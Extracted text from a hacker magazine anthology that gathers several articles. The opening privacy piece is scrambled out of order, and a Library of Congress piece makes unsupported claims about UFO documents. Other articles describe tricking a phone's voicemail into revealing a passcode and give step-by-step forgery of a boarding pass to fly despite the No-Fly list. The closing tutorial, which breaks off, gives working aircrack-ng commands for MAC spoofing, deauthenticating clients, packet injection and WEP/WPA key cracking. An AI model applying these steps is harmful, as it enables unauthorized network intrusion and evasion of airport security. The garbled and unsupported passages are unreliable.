difference is because the average person is not going to want to go through all of that trouble to find the information. http://www. Technically. they will go even further. simply apologize and say that the catalog “required a street address. phone number. USA 00000 Not all post offices will be keen on your use of their address in this way.THE HACKER DIGEST . Since I never registered my phone number with telemarketers. I do this because it is not really an “opt-out.” Even five-year-olds know the importance of not talking to strangers. Who knows what the future holds. I do not feel as if I should have to opt-out for something I never wanted in the first place. After that.) Now that you have put a lot of sweat into hiding your private information from the public. but I do know that we can all do something about it now! 1. If your name pops back up on the websites we worked so hard to take your name off of. Thompson West. You need a driver’s license (or other photo-ID) and another form of ID such as a utility bill. with no intention of resale. You can use that street address along with your box number. use the addressing scheme mentioned above and see if you receive your complementary catalog. The generally accepted Black’s Legal Dictionary defines “consumer” as “a person who buys goods or services for personal. which address do you think will be listed? You guessed it. there is a vast difference between going to the vital statistics office at a local courthouse to pull up a birth record and typing in a name to retrieve the same information. your PO box. so be nice to your postal employees. what information was presented? The post office name. If you receive it fine. or household use. These are all matters of public record and may be viewed by anyone. or full birth date. You may feel differently. I will reference “optout” with quotations. 3rd Pocket Edition.merriam-webster. you realize the importance of not giving up your real address anymore. If you take away the quick. go on the Internet and order a free catalog (it can be from anywhere. Yet grown. When you searched for an available PO box. Call your banks and other financial institutions and inquire about their privacy policies and how to limit the sharing of your information. deceitful. street address. we are left with the public information where it should be. you pay for the box.
Footnotes
Conclusion
50
. Throughout this article. Banks and PO Boxes The IRS requires banks. explained in a minute. in the public courthouse. While I did find a trick around this. If you receive the catalog with a note from the postal employees that you cannot use the address in this manner. brokerage firms. educated adults voluntarily provide whatever information a form asks of them (it’s scary these people actually have the ability to chose our country’s leaders). for some reason. Just because a form asks for something does not mean that it is required. family. and box availability information. even if they act like they should work at the DMV! To test this out.

a nefarious party couldn’t go on a spending spree. as long as you don’t mind me
The Wisdom of Bob
The Story Doesn’t End There
Uncle Bob informed the group of something that showed me just how much he had been keeping up with the current threats to privacy and personal information. “The only place I have things like access codes and passwords written down is on an encrypted disk that I keep in my lawyer’s vault for insurance purposes. Now. Why couldn’t you just reach for your credit card like a normal person?”
Years ago. “That’s not a check card. later. their reaction tends to be priceless. “but what happens if your wallet is stolen by someone who has the ability to discover your PIN number? What steps have you taken to prevent that from happening?” Bob looked at me curiously for a moment.. thus it was an auspicious occasion to have every single aunt. “This is a major security loophole. Bob remarked. “Perhaps I’m a busboy who took your overcoat from that hook on the wall as we were all eating.” my uncle stated with a laugh. if one can succeed in penetrating their defenses. it gave you an unfair timing advantage. but my Uncle Bob simply placed a fold of bills on the waitress’s tray while his brothers were fumbling with plastic.” I stated. and cousin represented at this Christmas Eve dinner.” he remarked. Then he laughed. you would typically be given an ATM Card.
Bob Reveals Nothing
The Challenge
51
. uncle. Not only does cash anonymize his spending. without my PIN number. would allow you to complete certain point-of-sale transactions) with the use of a four-digit PIN number. in which each attempts to pick up the tab. “and I always demand that a bank issue me an ATM Card specifically. the card is useless. Often. This appeared to be imminent. “Nope. and pointed out that there was still the matter of the bank card seen nestled in Bob’s wallet. It was at this point that my uncle revealed how very cautious he was being. however. “I will personally see to it that the biggestticket item on your Christmas list is under the tree in your home this year!” “Very well. “Imagine I’m a criminal who has stolen your wallet. not wanting to leave any digital trail of his spending habits. When the check eventually arrived. but if his wallet were to be lost or stolen..” I piped up. That way.The
THE HACKER DIGEST . Bob proceeded to instruct his relatives about the distinction between these two very similar and oft-confused pieces of plastic.. “I’m very impressed with your strict attention to security.. “That was smart of you to produce cash..” he said flatly. Many people looked at the bank-issued plastic in their wallets and vowed to change to a more secure card after the holidays. What would you say if told you I could discover your PIN number almost immediately after seeing your ATM card?” “If you can do that.” Bob’s older brother Sean remarked. Uncle Bob. most banks issue their customers “check cards” (almost always tied to the VISA Merchant Banking network) which can be used like a debit card (with a PIN) or like a credit card (requiring no PIN). Sean expressed incredulity over this. “Don’t the same risks of electronic records and criminals having a field day in Best Buy’s plasma TV section still apply?” he asked. it’s cash only for me ever since the Patriot Act was signed into law. and I don’t think that the FBI or the NSA is going to take an interest in stealing my money or my identity anytime soon.. our schedules are hectic enough that at least one or two individuals can’t make it back to the east coast for any given holiday.VOLUME 26
Security-Conscious
by Deviant Ollam
Uncle
My entire extended family sat gathered at a long table in a fine dining establishment.” I knew that such an assured person often makes the best target for a security challenge. way to get the drop on us. He explained how he ceased carrying credit cards years ago. when you opened a bank account. “Oh.”he told the group. That’s far beyond the reach of the common criminal. it’s an ATM card.” The group was impressed. I expected my father and his four brothers to immediately begin their ritualistic swordplay with credit cards. This mag-stripe token would allow you to withdraw funds (and.. They’re not the same thing..

Bob included. Say hi to your sister for me.. I considered things for a second. and that has to be picked up in person with proper ID. but this feature is always disabled by default. everyone. “Hello? Yes. heh. like so many of these persons.
The Explanation
Making the Call
The Revelation
52
.” He wore an expression of vindication. It looks like you took your daughter Mary’s birth date of March 6th.” Undaunted. You really do look stunning. “Relax. could you? I knew that was all smoke screen!”
I cracked a wry smile.. can you hand me your phone. yeah. From there. “No. On it were written four simple digits: 3652. Everyone sat breathlessly as I looked it over.. “Ok. I’m not interrupting am I? Oh right. and email accounts. your information is all very safe.. “Hah! You couldn’t discover it.. the system would reveal his access code to anyone holding his handset. Last name is O’Connor and the last four digits of the card number are 8579. When his mobile voicemail stated..THE HACKER DIGEST .. have a safe and happy new year if I don’t talk to you before the first!” I hung up and held the scrap of paper close to my chest.” My family. particularly in the “stolen coat” scenario about which we had hypothesized. web sites. I let the group chatter about in a frenzy for a short while. typically no code is needed.” he said after poking about in system menus for a second. but still.VOLUME 26
revealing this in front of everyone. but it had been for dramatic effect. “That’s strange. Because his voicemail settings weren’t configured for maximum security.. can you do a quick lookup for me? Yeah. But I wagered that Bob.” I explained to the group that what I had done was to simply leverage possession of Bob’s phone to my favor.. That is how Bob’s account was configured. I was referring to the fact that most people simply use their birthday or the birthday of a loved one.” I slid the scrap of paper across the table to Uncle Bob.. assuring me quite plainly that an attempt to social engineer any representatives whom I might reach at the bank’s customer service number would be a wholly useless endeavor. listen. I had accessed the “change personal options” menu. Thanks man. then said. If the individual is entering the voicemail system from their own personal handset device. The entire table set in with a cacophony of questions demanding to know who it was that I called and whether or not all of their own PIN numbers or banking codes were vulnerable. Even a legitimate card holder can only request a new card and PIN.” I took the ATM card and turned it over a couple of times. now sat slackjawed. A criminal grabbing someone’s phone along with their wallet isn’t all that outlandish a prospect. you do take security more seriously than almost anyone I know. reading both the digits on the front and the phone number on the back. I punched away at his phone’s keypad and held it to my ear. Aunt Ellen. Bob?” My uncle passed me his mobile phone. too. So.. but coupled it with what I can only imagine would be your wife’s birth year of 1952. Bob’s mobile provider offers a feature that requires parties enter their personal access code when checking voicemail.. got it. I handed my uncle back his phone and asked him to look at whom I had called. this is an ATM card issued by Commerce Bank. area? What if I were on the phone with some black hat teenager in his parent’s basement?” After a moment I picked up a pen left on the table by the waitress and started scribbling on a scrap of paper. “They’re trained specifically to never reveal anyone’s PIN number.. Bob looked absolutely stunned. You don’t seem to have done that. there was a bit of a smokescreen employed. Then I couldn’t keep up the act anymore. while pretending to have a conversation with a high-tech security expert. I wouldn’t have placed you anywhere near 50. your family doesn’t get together until tomorrow.C. and I wasn’t speaking to anyone about whom you should be concerned..” I knew that the odds were very good that these same four digits would allow me to clear out his bank account from almost any ATM! And I was right. Was I speaking to a friend at an investigative business of some sort? Or a spooky individual in the greater D. it’s not even sent through the mail. fails to be as unpredictable when constrained to four character places and the use of strictly numbers asv opposed to alphanumerics. “Indeed. “I’d like to make one call.. let me have a look at that card.. it’s me. “Your current passcode is three six five two.. The most security-conscious citizens often use a whole host of various passwords for computer systems. The rest of the family looked on as I conducted a brief conversation. I had simply dialed my Uncle’s voicemail and. Who in the world could I be calling? They knew I had some very interesting friends in the security world. Uncle Bob. “This only shows a call to my voicemail. I stopped trying to stifle my laughter and my deadpan expression broke down into riotous chuckling..” I explained that Bob was right.. selecting the “choose a new passcode” feature resulted in the automated voice on the other end of the line telling me what my current passcode was..

THE HACKER DIGEST .S. along with a statistical analysis done by researchers at MIT. In effect. they can send the people who they know are not on the lists. but there’s no reason to think that it has been successful or even useful in preventing terrorist attacks. Since she does not scan the barcode on the boarding pass and pull up the passenger name record from the airline’s database. He then prints out a second boarding pass with his real name on it. assuming the TSA has enough staff at a certain airport to give intensive physical searches to 8% of travelers passing through the security checkpoint. For the purpose of this example I will use “Ahmed Mohammed. they are going to find out if they are either on the No-Fly List. let us assume that you have the name of a terrorist or someone else on the list. the fact that this massive security flaw has existed for the past five years shows that the No-Fly list is a government attempt to collect information about its citizens or to provide a false sense of security. Perhaps the TSA will start scanning the barcodes on boarding passes at the security checkpoint. Here’s how: Ahmed buys a plane ticket in a false name. it seems likely that they could figure this out too. more that half of the TSA’s screening staff are wasted on doing Selectee List screenings. allowing the terrorist cell to be more than twice as likely to get their member through security without additional screening. along with his real ID. which would be the case if all searches were done at random. Either way.S. As a practical example on how to render the no-fly list completely useless. proves that it is only creating a false sense of security. In fact. the cell can send their members on “scout missions” in order to see who is given extra screening and who is not. Since terrorists generally don’t act alone and usually are part of a cell. she has no way of telling whether the boarding pass has the right name on it. rather than increases. he simply
53
. which doesn’t prevent a person from flying but requires him or her to undergo additional physical searches) are classified by the U. causing these unfortunate people many hours of delays and paperwork to get their names off the lists. where he puts away his fake boarding pass and takes out his legitimate one in the name of John Smith. Several years ago. in which case they will not be allowed to fly. since he knows that the airline’s agent will ask to see his ID when they attach the baggage ticket.” once a person actually buys a ticket and tries to fly. he checks in online and prints out his boarding pass in the name of John Smith. which the agent scans and sees the name of John Smith appear on the computer. Ahmed proceeds through the security screening and to the gate. in which case they will find a row of S’s conveniently printed on their boarding pass and will get extra special attention at the security checkpoint. easily. and even those with top secret security clearances have all appeared on the secret list. However. He proceeds directly to the security screening with his carry-on luggage and when the TSA agent asks for his boarding pass and ID. He also saves a copy of the HTML file for the boarding pass to his computer.
The U. he shows his fake boarding pass with his real name on it. such as John Smith. some students at MIT published an analysis entitled “The Carnival Booth.” an actual terrorist name listed on the FBI most wanted list. “No-Fly List” has been in effect for over five years now. there is just cause to think that the list makes us less secure. as it was designed to do. When Ahmed gets to the airport. But does the list really accomplish anything? A simple and practical way of circumventing the list. Since the gate agent does not check IDs at boarding. for the past five years we Americans have been sacrificing our privacy and security with a sham system that decreases. government. This means that when the terrorist cell actually carries out an attack. When the gate agent calls everyone to board. The TSA agent looks at both. In spite of the list being “classified. scribbles her initials on the fake boarding pass and thinks she has just done her part as a good American to stops terrorists in their tracks. American soldiers. and those people will only have a 3% chance of being searched instead of an 8% chance. The names of people on the lists (the No-Fly list and the Selectee list. cannot be challenged in a court of law. or both. our air travel security. or on the Selectee List. he does not check any baggage. Ahmed has successfully boarded the plane even though his name is on the “No-Fly List.” Their purpose was to show that having a No-Fly list actually decreases security instead of increasing it. then if 5% of passengers are selected for an intensive search based on the fact that their name appears on the “Selectee List. The names of babies. Can you still board an airplane even though your name is on the No-Fly list? Yes. The summary of the paper is that. or requiring the gate agent to check IDs. then changes the HTML in a text editor so that his real name appears in place of John Smith.VOLUME 26
by cbsm2009
Why the “No-Fly List” is a Fraud
presents the real boarding pass. she has no way of knowing that the ticket holder’s real name is Ahmed Mohammed. Within 24 hours before the flight. and are compiled from unknown sources.” then that leaves only 3% of passengers who are subjected to a truly random search.” Considering that terrorists were capable enough to fly a few jumbo jets into the World Trade Center and the Pentagon.

and like other mobile phone services.x. Picture Mail. So it’s probably appropriate that this is today’s setting for the ugliest gutter trash bastard child of telephony. Nextel literally went from city to city buying dispatch companies and similar businesses. It’s less clear now whether the spectrum swap deal was as good for Sprint as analysts initially assumed. Visit Pioneer Square any weekend. meaningful dialogue: “YO CRACK DAWG WHERE U AT??? I LOOKIN’ FOR DA FEMALES!” iDEN is a proprietary standard first commercially deployed in 1994 on the Nextel network. but legally they aren’t. And then they proceeded to do almost nothing with it. and a “Walkie Talkie” number (used for trunked radio). the network was already suffering from capacity limitations. but is always in the 10. the SMR spectrum on which Nextel operated was adjacent to numerous public safety frequencies. Incidentally. This process was completed in the summer of 2008. which is in the format 112*nxx*xxxxx. The brand did very well under independent management.x. Nextel operates in 800-900MHz spectrum called “SMR. the Nextel network (which was already capacity constrained) began to experience serious problems with dropped calls. This is because coverage on the iDEN network is limited to Nextel’s native footprint and roaming is only available (at extra cost) on a few select foreign carriers in North and South America.VOLUME 26
Telecom Informer
by The Prophet
Hello. When Sprint bought Nextel in 2005. However.
54
. making the service less expensive for Sprint to offer. this was certainly the case. etc. Nextel users began leaving Sprint in droves. On this gorgeous day. they signed a wholesale Mobile Virtual Network Operator (MVNO) arrangement with Boost Mobile. and incoming calls delivered straight to voicemail. While Nextel was still an independent company. It ended near Pioneer Square.” which was originally intended for the purpose of taxi dispatch systems. the dust had finally settled from rebanding mayhem .but there were hardly any Nextel customers left to care. the Motorola iDEN system. Meanwhile. or if I’m just the only sucker who was willing to take the job. The very concept of Skid Row was invented in Seattle. Boost does not offer a talk group feature. Sprint acquired the Boost brand and brought it in-house. After protracted negotiations. the most beautiful time of the year here in the Pacific Northwest. Additionally. During rebanding. prompting numerous. and young twentysomethings living the Thug Life are everywhere. system busy messages. Predictably. and walkie-talkie services. a prepaid lifestyle brand focusing on young urban customers. urgent complaints to the FCC by public safety agencies. Sprint agreed to vacate portions of the SMR spectrum (through a process called “rebanding”) in exchange for vast swaths of RF spectrum in the 900MHz and 1800MHz bands. iDEN handsets look like cellular phones and quack like cellular phones. The IP address is used by the mobile browser. This plan offers “all you can eat” access to voice. in the second quarter of 2009. data. today the center of Seattle’s nightlife. Using the “Walkie Talkie” number. Shortly after the Sprint-Nextel merger. However. Sprint launched the Boost Monthly Unlimited plan. no roaming is available. which was called Boost. Literally everything is covered except for international usage. on average more than one million customers per quarter. Nextel built the first nationwide mobile telephone network free of roaming charges. an IP address (assigned whether or not you subscribe to data service). I’m beginning to wonder if I’m the only technician left in the state who still knows how to fix anything. limiting the utility of this feature. By early 2009. There is also a PSTN telephone number. their Boost Mobile iDEN handsets chirping away in profound. and at half the price of similar “unlimited” services. Bing Crosby once sang that the bluest skies he’d ever seen are in Seattle. and welcome to the Central Office! Spring has turned into summer once again. construction radios. text. The iDEN network resulted in considerable interference to users of these frequencies. However. They are trunked business radios with the ability to make phone calls. To acquire its spectrum.x IP space (which is non-routable). and quickly grew to become one of the largest MVNOs in the country. The general consensus at the time was that Sprint made out like a bandit on the deal.THE HACKER DIGEST . Sprint had a largely moribund business to contend with. Boost handsets have a telephone number. Boost handsets are capable of trunked radio communication with any Boost or Nextel handset (along with select foreign iDEN carriers). In this manner. most of which I spent in the Westin Building working on a troublesome tandem trunk. finding itself with plenty of spare unused iDEN capacity.

Even on the least expensive prepaid rate plan. the time has come once more for me to go. Like most prepaid wireless carriers. Voicemail is available. Another unusual feature allows you to configure your handset so it automatically answers after a specified number of rings. it is not necessary to have a data plan for this feature to work (an important distinction. Based at a former nuclear missile silo. music. many users have reported that it is possible to activate it on an iDEN Boost plan (such as Monthly Unlimited). Performance is also slower than with most other mobile carriers. The wIDEN 2. Inexplicably. billing while the call is on hold) so you can place another call in the background.toorcamp. and uses the MMS standard for backhaul. I’ll see you there! http://www. it is suitable for shell access and email. it appears that this project has been mothballed.Download link for Windows iDEN driver used for packet data tethering.and this interval is. but the 40404 (Twitter) short code does not work. And with that. and is a 2G data service.boostmobile. As of this writing. International calling rates are better than most prepaid carriers.org – Toorcamp – North America’s first ever full-scale hacker camp! 4th of July weekend. and fun projects. as is the case with MO-SMS on CDMA and SMS on GSM). 2009.4Kbps peak. neither configurable nor adjustable by Customer Service. but it answers after just three rings .com/matt/files/ ➥nextel/techover. You can then switch back and forth between calls. an iDEN plan on this network provides exceptional value (unlimited calls. iDEN data runs at approximately 14. and many representatives do not know how to accomplish this. because messages must be uploaded and downloaded via packet data (rather than by using spare capacity in the control channel. and no roaming is allowed.5G standard allows for 144Kbps peak. and it’s time to put the finishing touches on the Toorcamp main stage! Incidentally. allowing you to forward calls to another number either immediately or after a specified pause.zip . Boost iDEN supports an unusual feature allowing you to place the active call on hold (of course. Although coverage is limited to the native Sprint CDMA network. However. strangely. the 466453 (GOOGLE) short code has been enabled. iDEN does not allow for simultaneous voice and data usage. users must contact Customer Service to have it specifically enabled.com – Boost Mobile official site http://webaugur.pdf . http://idenphones. Caller ID is available. and 1xEV-DO data service). Sprint deployed wIDEN in major metropolitan areas between 2007 and 2008 and tested it for several months. For a brief period in mid-2008. To Art Brothers and the great folks at the Beehive Telephone Company. Boost users with certain handsets (such as the i425) are able to achieve a tethered connection to a Windows laptop. SMS. but stay out of trouble. one need only install the Motorola iDEN driver. because for all plans except Monthly Unlimited. data transmission stops in the interim. thanks very much for your hospitality! I do hope to visit one of your solar powered Central Offices To ThoughtPhreaker. Customers requiring high speed data services are steered to 1xEV-DO handsets on the CDMA network. This was discontinued in early 2009.8. data service costs 35 cents per day regardless of actual usage). This is surprisingly easy. While the experience is very low bandwidth. although STi Mobile (a Sprint CDMA MVNO) offers better pricing overall. Boost offers international calling.THE HACKER DIGEST . connect the handset to the laptop using a USB cable. only available for Monthly Unlimited plan subscribers. Although speeds are slow.Motorola iDEN technical specification. incredibly. While users can place outbound calls from within a data session.VOLUME 26
Boost is capable of sending and receiving SMS and MMS messages. MMS is more commonly used for picture and video messaging on other carriers. As is the case with most data protocols. Although many handsets sold on the Nextel and Boost networks are wIDEN-capable. there is no billing for data usage.
References
Shout-Outs
55
.com ➥/iden/support/downloads/Motorola ➥_End_User_Driver_Installation ➥_2. but you cannot join them. have you heard of Toorcamp? Come to the Pacific Northwest over the 4th of July weekend and be part of the first ever full scale hacker camp in North America. I’m finished here at the Westin Building. Telephone service on Boost has some unusual features and limitations for wireless carriers in general. and then set up a dial-up connection with the telephone number “S=#777” (leaving the username and password blank). And Boost offers a rich and full featured call forwarding option. Text messaging is also distinctive on Boost. they canceled the upgrade project in mid 2008 and disabled wIDEN. the organizers are planning a hacker extravaganza of art. Call waiting is. it’s always phun seeing Portland phriends! Keep exploring. and it’s even possible to social engineer Boost customer service into performing an ESN change to a Sprint CDMA handset or PDA. If you are still able to find a Boost CDMA handset. but three-way calling is not. Although three-way calling isn’t available.motorola. but especially prepaid carriers. This results in some incompatibilities.0. Sprint launched a Boost product on the CDMA network. cool hacks. particularly with short codes. http://www.

Me neither. The “Library Catalogs” link at the top is very useful for finding documents that you need/want to request. but not required. so you aren’t able to go all the way to the Library of Congress and spend a bunch of time searching through it. however. The Library of Congress is a great place to look for things.
56
. No. things work very differently within the Library of Congress than anywhere else. as well as the real deal surrounding all the old hoopla of Area 51. Shouts to my wife. but don’t count on the librarians knowing everything in the library. One of the most useful ways to go about it is the link at the top of the page that says “Digital Collections. with something that might be useful to everyone. On this page there is also quite a bit of help about using the Library of Congress search engine and I strongly recommend at least perusing it. If they aren’t. Even though we know that there is. until next time. considering the nature of the information. you can request specific documents to be put up or sent to you. though.THE HACKER DIGEST . You also really need to know exactly what you are looking for. So be a bit careful when using this feature (even though we know the documents are there). and so forth. They are only required when requesting specific documents that are not online.gov/! At this website you can look up the many declassified documents already online. so you can choose which one you need. especially the arcane nature in which everything is organized. The pros and cons are right there in the descriptions. I will not say. have fun. As for what these documents hold. it wasn’t a weather balloon. There are time limits on how long documents can be classified.” Once there. one of which says “Ask A Librarian. It does take a bit of getting used to.” Of course there is a better way: http://www. On the left are several more links. There is a basic search and a guided search. because. but don’t know where to find them. I will say the documents are there. You have to have something to learn. “there has to be another way. For the most part. If you do it correctly. they don’t respond well to people who sound like they are conspiracy theorists. that being said.loc. and you know what you are looking for. Including old documents regarding the protocols of potentially interacting with “Non Terrestrial Beings.VOLUME 26
Finding Information in the Library of Congress
by Fantacmet
Greetings fellow phreaks and hackers. because I have seen them and I have found them most interesting. Fantacmet here. I’m sure some of you have heard that there have been documents that have been declassified. I’m out of here. at least as far as non-military agencies go. asking about the declassified records of the CIA regarding the Kennedy Assassination will probably get you ignored as a moronic conspiracy theorist and/or have them telling you that there is no such thing. (especially in the past several years) these limitations are being enforced and documents are being declassified.” Well. and LinuxHologram. Ok. my two kids. So you’re thinking. Keep it real and. Specific document numbers are helpful. you can find the documents regarding the Kennedy Assassination. although these are sometimes ignored and scheduled for declassification at a much later date in order to prevent public opinion from swaying on a particular person or subject. I’m not gonna give away all the secrets. Especially if you are a conspiracy theorist. you are presented with several categories from which to choose. The answer is simple: the Library of Congress. For instance.” This could be useful. even if you are a search engine expert.

} As you can see. (Remember. and maybe get a free router out of it! A year later. So I searched the HTML for “send_ request”. form1. WPA-PSK. About a year ago.submit()). “[object HTMLSelectElement]”! I went a step further and typed: javascript:alert(document.value). by disabling SSID broadcast and allowing only our two MAC addresses to connect. but D-Link practically disavowed the existence of this thing.value = “1”. so I glossed right over it. Now the dialog box returned “3”. Aha! The webpage changed.” or something stupid like that. but what does that mean? A quick google search told me that selectedIndex is the index of the value a drop down menu has chosen. so good. A dialog box popped up and behold. 15 seconds later. (There’s not much traffic on our street – still not forgivable. The DI-524. I noticed that when I hovered the cursor over the “Apply” button. “TWO-FO”. Therefore. and it turned out that it confirmed that you retyped your passphrase correctly. and found this was the ONLY reference to check_key()! Way to go D-Link! That would certainly explain why the authentication failed.THE HACKER DIGEST . if(auth. then made the value of “apply” true. it showed me that all was well! I overcame D-Link’s idiocy and have a working.getElem ➥entyById(“apply”). (In hindsight. I bought the D-Link DI-524 wireless router from Best Buy for about $15.selectedIndex == 0){ return true. stas. cheap garbage that it was. which also gives me a happy wife! Shoutouts to the Revolution. The most they could give me was an emulator for the interface. s e l e c t e dIndex).submit(). angelsteed. I use Iceweasel (pronounced “Firefox”). suncrushr.. was the “3” it referred to. I actually looked over the code. Finally. Connection refused. So far. I decided to take the time to figure this out. which confirmed that I had what appeared to be the latest firmware.. I figured that was a steal I couldn’t pass up! It even came with a USB adapter! I could resell the adapter.get ➥E l e m e n t B y I d ( “ a u t h ” ) . I Ctrl-F’d for precheck_key():
function precheck_key(){ var auth = get_by_id(“auth”).. along with my mess. I didn’t have that many clues.) So then the if/then/else clause runs check_ key().) I sat next to our TV wired. Ctrl-F’d through the source code. I set the value: javascript:alert(document. ➥getElementById(“auth”)). and so I musn’t change it. because my old WiFi card couldn’t connect to a non-broadcast signal. so I could type Ctrl-U and handily look at the HTML. That’s right – you’re allowed to do that in hacking. when I actually had the internet connection to use it on. so I typed this into the location bar on Iceweasel: javascript:alert(document. SSH? No. since it wouldn’t work in Linux anyway.
57
.getElem ➥entById(“apply”).. } }
I ventured a guess that the function get_by_ id() was a nice way to call document. Thus. because Javascript sucks for debugging and D-Link wasn’t very forthcoming with error messages.value = 1) and typed in that previous step again to confirm that I actually did reset the value. and saw that the fourth option. was configured through the web browser. 0 is 1 and 3 is 4. However. I discovered exactly why the router was so cheap: the web interface refused to encrypt my wireless connection! That’s a very important feature D-Link neglected to enable! So I tried telnetting in. phalkon13. Here’s what I got: function send_request(){ if (precheck_key() && check_ ➥wpa()){ get_by_id(“apply”).VOLUME 26
Hacking the DI-524 Interface
by der_m
Here’s an example of the practicality of the hacking mindset. out of the living room. So for about a month I secured my wife’s wireless through obscurity alone. abbot. and submitted the form.. } else{ return check_key(). encrypted. The dialog box popped up “0”.. It’s easy to forget that 90% of hacking is scratching your head in confusion and digging to find the answers to that confusion. I looked again at the webpage. like most modern routers. send_request() confirmed precheck_key() and check_wpa() both returned true. indicating the router was restarting. ziddar. either precheck_ key() or check_wpa() was messing something up. nocturn. I typed: javascript:alert(form1. and weren’t using “1234. wireless router! I now connect happily to a broadcast wireless connection through wicd and can keep my laptop. check_wpa() was about 40 lines of code.) So. So I determined that all those checks could be bypassed and proceeded to the “then” clause of the send_request() function to see if I could manually do it. my status bar said “javascript:send_ request()”.getElementById(). I checked for a firmware update. I typed into the location bar: javascript:alert(document. and my fellow sleeper agents.

so there is no need to use ipwraw). You also need the ability to do packet injection. that wiki has plenty of information on the tools included.org/) to check out the hardware compatibility list (HCL) to see if your machine and WiFi card are compatible. the ath9k driver creates mon0). this particular driver has been patched. navigate to /boot folder on the USB drive and run bootinst. as it’s often rebranded.VOLUME 26
Simple How-to on Wireless and Windows Cracking
by KES
You’ve heard the story a dozen times: someone’s on their morning commute from the bedroom to the basement office.remote-exploit. before BackTrack really boots. In my machine. Now you should be ready to proceed to the next step. and many just need a new driver (discussed later here. and then (feel free to replace 00:11:22:33:44:55 with another option if you like):
airmon-ng stop wifi0 macchanger --mac 00:11:22:33:44:55 wifi0 airmon-ng start wifi0
Another note about drivers: some drivers create a new interface when airmon-ng start takes place.org). you can test by typing iwconfig and looking at the MODE. and then select the USB drive).com/ 4. a little bit of careful planning can make that a problem of that past. ➥isobuster. you’ll have the opportunity to choose a graphics option.html 3. The .iso is almost 800MB.THE HACKER DIGEST .. a beta version of BT4 has recently been made available) 1. and may create a new interface (for instance. Download isobuster at: http://www. but it’s not a sure bet just how to tell your machine to boot it. Find a USB drive. my adapter is wifi0 (which I use throughout the remainder of the instructions). I’ll give two examples here that I’ve seen personally and there is a ton of information on the web.iso. ends up bouncing down the stairs on their head and. voila. break the WiFi keys. choose a network you’d like to use.org/backtrack ➥_download. “ipconfig /all” tells me so) so. some machines will try booting from the USB automatically. which basically does it all for you (no #4. The first step is to build a bootable USB drive with the Backtrack distro. If your existing card is not. Easy.5) Now your bootable USB is ready to go. It should be in Monitor instead of Managed. then F12 to choose a boot device. type lspci and it will tell you what the hardware is. to change my driver (if you are using the BT4-beta. for him. but you may want some extra space 2. Download the USB . If you’re having a hard time figuring out what WiFi card you really have. and copy the / boot and /BT folders to the USB drive 5.bat 3-alt) Use a tool such as unetbootin. You can also watch the association list at the bottom of the page to see which APs
58
. however. Before reading this. so I’ll leave this part to you: I have the Intel Pro Wireless 3945 WiFi adapter in my machine (at a command prompt in windows. right? And now. If this occurs after airmon-ng start. and use some information gathering tools to recall what’s going on.. Lastly.. so a 1GB drive would work. identifying and cracking the WiFi network(s).. the process is:
BackTrack USB Boot Disk
Once you think you have the right driver in place. depending on which WiFi card you have. open the . you may have to utilize a new driver. my friend’s was ath0. I type:
modprobe –r iwl3945 modprobe ipwraw
wlanconfig ath0 destroy wlanconfig ath0 create wlandev wifi0 ➥ wlanmode monitor ifconfig ath0 up
My friend has a MacBook Pro (Atheros 5418 WiFi) and. it is well worth your time to visit the Backtrack wiki page (http://wiki. Once Backtrack is loaded. they just can’t seem to remember the password to their computer.. you’ll need to do the following:
ifconfig mon0 down macchanger –mac 00:11:22:33:44:55 mon0 ifconfig mon0 up
And then substitute the new interface in all subsequent instructions. or to their wireless network. First. we’re going to change our MAC address for a little privacy. This is also where you would implement any special boot instructions found on the HCL mentioned earlier (you hit tab to enter them). some of which are touched on later.. The command iwconfig will show you which yours is. ➥remote-exploit. we have to take a peek at what networks are up in the area:
airodump-ng wifi0
If you’d like to focus on the “low hanging fruit” you can use:
airodump-ng –t WEP wifi0
Now. but it seems many of the drivers enable both features. open an xterm window by typing xterm into the small text box to the right of the menu buttons. But before that happens to you (again?). Also. a process that is very quick and easy (this tutorial was written when BT3 was the most current. Looks like they need a way to access the locked computer. Also. I typically watch the DATA column to see which have activity. there are tons that are.iso at: http://www. For instance.remote➥exploit. Using isobuster. while with others you must interrupt the standard loading (I am on a Lenovo R61 so I have to hit the blue “ThinkVantage” button. Now. That is why you’re reading this. doesn’t see that empty beer/ Red Bull on the steps. right? You wouldn’t be doing any of this on anything but your own personal computer and personal network. and at length on the BT forums at http://forums.

If it has captured a handshake. It also has the ability to perform a Man in the Middle attack. Now. This focuses airodump to just gather information on that channel.cap
WEP Cracking
where [essid] is the name of the network. It monitors network traffic and grabs usernames.oxid. If there’s no one there. with different themes and so on. So. etc. This is my personal choice. jump ahead. aircrack will try again. service type. elapsed time. you can surely find what you need (except for Nessus and Cain & Abel). To do this. [filename] is of your choosing. Metasploit Framework (http://www. you have to use a wordlist to crack it. just leave it be. keep reading. If you’re having problems. you can shut down. Very easy to use.org/. Stop airodump (Ctrl-C) and restart as follows:
airodump-ng -c [channel] -w ➥ [filename] -bssid [bssid] wifi0
Where [channel] is from the CH column. Now that you have opened an airodump window for the network you’re targeting. You can either download this to your machine before booting to BackTrack or. Once you have your handshake. so open a third xterm window. and it even has a default scan profile (or you can make your own). and then flood the network with data to enable key cracking.. enabling you to grab https data. to generate the data:
aireplay-ng -3 -b [bssid] -h ➥ 00:11:22:33:44:55 wifi0
If you look at the airodump window you left running. Cain & Abel (http://www. but only because I got used to this toolbox. time. and enter:
aircrack-ng -b [bssid] [filename]-01.txt] ➥ -b [bssid] [filename]-01. Nessus (http://www. Cain has tons of other features. date. When the DATA column hits each increment of 5000. You want
59
. Alternatively. So now you can a) wait. reboot in Windows. Now we need to associate with the network of interest. It will then indicate which hosts have which weaknesses/unpatched holes. or b) if there are clients. you can change the 1 to more (5. This is an ideal partner tool for Nessus. ➥cap
It will test the data gathered to that point and. then you’ve come at a bad time. this is going to take some time. there will also be: [WPA handshake: [bssid] You’ll see the client MAC(s) in the Station list at the bottom of the airodump window. First. you may have to try a few times (or other times of day). but there is an easy command line interface as well). just download one before changing drivers and such (which can interfere with typical Internet access). and enter:
aireplay-ng -0 1 -a [bssid] ➥ -c [client MAC] wifi0
WPA Cracking
This will send one de-authenticate packet to the client. and VOIP calls. open a new xterm window. but increment slowly.. If this is successful. you should now see the DATA column growing like the national debt.nessus. and other items that would otherwise be missed. kick someone off the network to force them to re-authenticate. double click and choose your payload (what you want to do on the target machine. if you prefer. ➥aircrack-ng. you have to capture the handshake that is generated when a valid user joins the network. you’ll see the following:
Sending Authentication Request ➥ (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful :-) (AID:1)
